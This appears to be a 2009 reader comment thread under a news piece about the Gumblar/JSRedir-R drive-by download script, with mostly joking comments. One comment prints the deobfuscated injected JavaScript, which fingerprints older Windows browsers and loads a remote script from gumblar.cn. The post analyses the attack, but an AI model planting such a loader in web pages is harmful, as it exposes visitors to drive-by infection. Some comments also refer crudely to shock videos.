Malware
I thought malware writes itself nowadays.
New script outstrips all other drive-by download risks
A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …
This topic is closed for new posts.
Another good writeup here
Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
It seems to be cropping up all over the place with no obvious infection vector.
2G1C
haha.
"Erm, I have a virus"
"Did you go on 2G1C?"
"Erm, yes...."
2 girls 1 cup
I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.
I nearly threw up on my laptop.
"2 Girls 1 Cup scat video viral website."
I guess they must have crappy security...
Clever script
I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.
function(){
var versionString = "";
if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {
zrvzts="A";
if(window.ScriptEngine) {
versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
}
document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );
} }
@The Author
"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."
NO JUST NO
It took me a month to get that image out of my head and here you go putting it back there.
I guess im just going to do like Sam Neil in Event Horizon
http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg
/Good bye to my eyes
apple salesmen.
Apple will be happy, more of the the weak minded who get this kind of crap on their computer will be driven to buy a mac.(which is perfect for them).
Apple could write some themselves but they would be 200 megs and keep asking you if you want to update them.
@AC 15.01
>I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.<
Yeah, thanks for that. You owe me a new computer. This one smells real bad now
2g1c?
'2 girls 1 cup' < '1 guy 1 jar' < '1 guy 1 screwdriver'
god only knows whats going to be next.
Eric Arthur Blair suggests...
"god only knows whats going to be next."
Is it 1 Boot (stamping on) 1 Face (forever)?
This topic is closed for new posts.
Sign up, sign up for The Register's weekly IT security newsletter - click here
Popular Whitepapers
- The BI Inflexion Point
Information is a right, not a privilege - Risk and Resilience
The application availability gamble - Register Research on: Agile development - is it right for you
Reaping the benefits of modern software practice - The Register Guide to managing spam
A primer on the implications for enterprise IT - The Register Guide to email security
A primer on the challenges of securing email and approaches to resolving them - High Performance for All
Responding to the needs of compute-intensive workloads
